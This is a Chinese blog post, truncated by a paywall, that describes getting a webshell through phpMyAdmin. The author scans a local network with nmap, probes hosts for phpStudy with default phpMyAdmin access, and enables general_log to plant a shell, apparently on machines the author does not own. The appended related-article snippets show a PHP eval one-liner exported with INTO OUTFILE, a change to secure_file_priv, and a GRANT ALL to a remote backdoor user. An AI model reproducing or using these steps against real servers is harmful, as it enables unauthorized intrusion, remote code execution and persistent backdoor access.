利用phpmyadmin获得webshell

最新推荐文章于 2024-05-27 17:25:08 发布
最新推荐文章于 2024-05-27 17:25:08 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: webshell 文章标签: webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mikasa_/article/details/88425166
版权

这个是网上无意间找到的测试了一下竟然可用。。。嘿嘿嘿嘿嘿

1.利用Nmap扫描当前局域网网段上所有主机

nmap -sn -PE 192.168.1.0/24        ##扫描192.168.1网段上的所有主机

发现:
在这里插入图片描述

发现了不少于是,一个一个试试看打开了phpstudy没有,最终发现了一个:
在这里插入图片描述
竟然连探针都没删,暴露了物理地址!!!还可以试试phpinfo.php有没有删除。。还有进行报错什么的看看可不可以爆出物理路径:
利用初始进入phpmyadmin(大佬们勿喷,,,,内网渗透一点都不会。。。。):
在这里插入图片描述

接下来开启general_log(好像是日志文件,在phpmyadmin中可以开启,并设置路径,这样我们查询的一切数据就都会被记录在这个日志中!!)

set global general_log='on';   ##开启

最低0.47元/天 解锁文章
Mikasa_
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用phpMyAdminwebshell
05-01
利用phpMyAdminwebshell 利用phpMyAdminwebshell
phpmyadmin上传Webshell总结.docx
08-31
PHPMyAdmin是广泛使用的MySQL数据库管理工具,有时会被黑客利用来上传Webshell。以下是对利用PHPMyAdmin上传Webshell的详细总结: 1. **select查询输出Webshell** 这种方法的关键在于`secure_file_priv`的设置。...
phpmyadminshell
华丽的贵族
10-29 218
secure_file_priv是一个全局变量,是指定文件夹作为导出文件存放的地方,默认情况是一个空置(NULL); 打开后用into outfile 等函数可以将一句话写入secure_file_priv目录下; 1.把secure_file_priv的值设置为网站根目录: set global secure_file_priv=‘C:\phpStudy/PHPTutorial/WWW’; //...
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1211
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql的数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库。
PhpMyadmin后台拿webshell方法总结
浅笑996的博客
06-29 3762
前言: phpmyadmin后台拿webshell的方法主要分为两个方法: (1) 、通过日志文件拿webshell; (2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难); 本地搭建环境: Phpmystudy 2018 PHP--5.5.38 一、日志文件写入一句话来获取webshell: (1) 、首先我们先利用日志文件写入一句话来获取webshell,日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中,换个思路想一下把这个
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1210
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
phpmyadmin getshell
YouthBelief的博客
11-11 4986
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
phpMyAdmin漏洞利用与安全防范
02-25
但是,如果存在设置的Root密码过于简单,代码泄露Mysql配置等漏洞,通过一些技术手段,99%都能获取网站webshell,有的甚至是服务器权限。phpMyAdmin在一些流行架构中大量使用,例如phpStudy、phpnow、Wammp、Lamp、...
利用phpmyadmin找回wordpress忘记管理密码
09-29
在这种情况下,我们可以利用phpMyAdmin这个强大的MySQL数据库管理工具来更改WordPress的管理员密码。以下是使用phpMyAdmin找回WordPress忘记管理密码的详细步骤: 1. **确认数据库信息**: 在开始操作前,你需要...
phpmyadmin写入webshell
weixin_48776804的博客
05-17 327
phpmyadmin写入webshell
php version 拿shell,总结PHPmyadminshell
weixin_39632379的博客
03-24 190
下面由phpmyadmin使用教程栏目给大家总结phpmyadminshell,希望对需要的朋友有所帮助!PHPmyadminshell总结PHPmyadmin修改用户密码直接点击上面的localhost或者1270.0.1,出现用户一栏,点击修改即可添加超级用户guetsec密码ooxx并且允许外连GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' ID...
登录phpmyadmin获取系统shell
R3332136304的博客
06-28 253
在对目标系统进行目录扫描时发现该web系统存在phpinfo信息泄露以及phpmyadmin管理后台 目录扫描工具为 dirsearch 访问 phpmyadmin 发现存在弱口令 root/root 由于 phpmyadmin 可以直接执行sql语句,所以想直接通过 phpmyadmin 执行 sql 语句读取文件以及写入 webshell。 执行 SHOW GLOBAL VARIABLES LIKE "%secure_file_priv%" 发现值为NULL,无写入读写文件权限。 mysql 数据库中
php网站怎么拿shell,phpmyadmin两种拿shell
weixin_39575758的博客
03-17 211
简介phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页...
如何用PHP写webshell,phpAdmin写webshell的方法
weixin_42299018的博客
03-16 647
一、常规导入shell的操作创建数据表导出shellCREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘’);SELECT `content` FROM `shadow9` INTO OUTFILE ‘C:\\phpStudy\\W...
phpmyadmin拿网站shell
J_joker_的博客
11-16 849
时间:2018-11-15 ID:joker_vip(CSDN)     这是本人第一次在这个论坛发表学术文章,希望我的文章能够给一些新手一些帮助,如果有问题,希望大佬们能轻喷。因为我也是在校大学生,也是信息安全方面的爱好者,所以这些渗透只是也全是自学的,也希望有大佬指点指点我,带一带我。     这次的渗透是半运气+半技术的成果,首先在谷歌搜索引擎中批量查找存在PHP探针的网站,类似于下图...
php 调用shell读取mysql_phpMyAdminshell的两种方法
weixin_33176326的博客
01-26 176
一.phpMyAdmin用户名和密码1.如何获取phpMyAdmin用户名和密码:弱口令root/rootroot/空密码root/123456phpMyAdmin爆破工具信息泄露(配置文件等)sql注入等等2.网站绝对路径,如何获取网站的绝对路径呢?单引号爆绝对路径xx.asp?id=1’错误参数值爆绝对路径xx.asp?id=-1搜索引擎搜索绝对路径site:xxx.com errorsite...
phpmyadmin新姿势getshell
Au
11-03 6582
百度百科:phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HT...
批量获取phpMyAdmin信息
weixin_44023460的博客
12-09 1004
by antian365 simeon 在前面的专题中介绍了phpMyAdmin暴力破解Mysql Root账号密码,爆破的前提是知道哪些网站或者url中存在phpMyAdmin,换句话说如何获取这些URL,使用Google和百度等搜索引擎搜索关键字“phpMyAdmin”出来的干扰太多,据笔者研究,目前比较好用的有Zoomeye.org和shodan.io搜索引擎对于批量关键字检索效果比较好,在...
phpMyAdmin使用步骤详解
"phpMyAdmin使用教程" 在学习和使用phpMyAdmin时,了解其基本操作和功能至关重要。phpMyAdmin是一款流行的开源Web应用程序,用于管理MySQL数据库,它提供了直观的图形用户界面,使得非程序员也能方便地进行数据库的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值